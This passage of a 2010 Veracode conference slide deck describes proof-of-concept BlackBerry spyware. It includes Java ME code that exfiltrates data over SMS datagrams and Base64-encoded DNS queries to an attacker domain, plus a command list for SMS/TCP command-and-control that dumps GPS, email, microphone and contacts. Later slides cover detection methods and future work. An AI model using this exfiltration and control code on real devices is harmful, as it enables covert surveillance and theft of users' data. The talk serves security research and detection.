  • 47. SMS Datagram Exfiltration  API – javax.microedition.io.Connector – javax.microedition.io.DatagramConnection – javax.microedition.io.Datagram  Pseudocode DatagramConnection dc = (DatagramConnection)Connector.open("sms://"+this.pnum+":3590 "); Datagram d = dc.newDatagram(dc.getMaximumLength()); byte[] buf = msg.getBytes(); d.setData(buf, 0, buf.length); d.write(buf, 0, buf.length); dc.send(d); © 2010 Veracode, Inc. 52
  • 48. DNS Exfiltration do { // Code to trim the message to 200 chars per iteration } try { msg2 = Base64OutputStream.encodeAsString(msg2.getBytes(), 0, msg2.length(), false, false); conn = (DatagramConnection)Connector.open("udp://"+msg2+"."+this.domain+":7272;4444 "); conn.close(); } catch (ConnectionNotFoundException e) { return; } catch (IOException e){ // Do nothing, just catch and ignore } } while (msg.length() > 200); © 2010 Veracode, Inc. 54
  • 49. Threaded Exfiltration  Listener based exfiltration methods use separate thread  Doesn‟t freeze UI interface  Queues messages outbound if network is slow  ThreadedSend extends Thread class  Uses run() method to call exfiltrate() © 2010 Veracode, Inc. 58
  • 50. Command and Control Channels  Default is inbound SMS communication  Bi-drectional TXSPROTO TCP based command and control – Additional Stealth (intentionally not completely invisible) – Allows for pretty GUI clients (basic mock up done) – Will more easily allow for control of multiple victims – Can be used to easily implement novelty attacks  Swap the contact databases of two victims  Easily have phone A call phone B  Integrated Google earth tracking of victim without parsing return email responses  Much more shenanigans! © 2010 Veracode, Inc. 59
  • 51. Command and Control Channels  initCandC(int a) – Initializes inbound SMS listener if passed a == 1 – Kills spyware otherwise – Listens for commands and acts accordingly TXSDIE TXSPHLON TXSPHLOFF TXSPIMON TXSPIMOFF TXSSLINON TXSSLINOFF TXSSLOUTON TXSSLOUTOFF TXSGLON TXSGLOFF TXSEXFILSMS TXSEXFILSMSDG TXSEXFILEMAIL TXSEXFILGET TXSEXFILPOST TXSEXFILTCP TXSEXFILUDP TXSEXFILDNS TXSDUMPGPS TXSDUMPPL TXSDUMPEMAIL TXSDUMPMIC TXSDUMPCON TXSPROTO TXSPORT[PORT] TXSPHONE:[PN] TXSURL[URL] TXSGTIME:[N] TXSPING TXS:[HOST] TXSIP:[IP] TXSEM:[EMAIL] © 2010 Veracode, Inc. 60
  • 52. Methods of Detection and Future Work © 2010 Veracode, Inc. 61
  • 53. Methods of Detection  Additional Operating System Prompts – Remove the “Trust Application” prompt requiring individual configuration  Signature Based – This is how the current anti-virus world is failing  Sandbox Based Execution Heuristics – Still requires execution in a sandbox and is reactive – Can‟t ensure complete execution  Static Decompilation and Analysis – Enumeration of sources of sensitive taint and exfiltration sinks – Control/Data flow mapping for tracing sensitive taint from source to sink – Compare findings against expected values © 2010 Veracode, Inc. 62
  • 54. Future Work (Offensive AND Defensive)  Reverse engineer .cod file format  Continued research into unobstructed installation methods (requires exploitation)  Infect PC with virus that acts as distribution hub  Research additional exfiltration methods for tunneling without prompting © 2010 Veracode, Inc. 63
  • 56. Conclusion  We are currently trusting the vendor application store provider for the majority of our mobile device security  Minimal methods of real time eradication or detection of spyware type activities  No easy/automated way to confirm for ourselves what the applications are actually doing © 2010 Veracode, Inc. 65
  • 57. The Monkey Steals the Berries! Questions? © 2010 Veracode, Inc. 66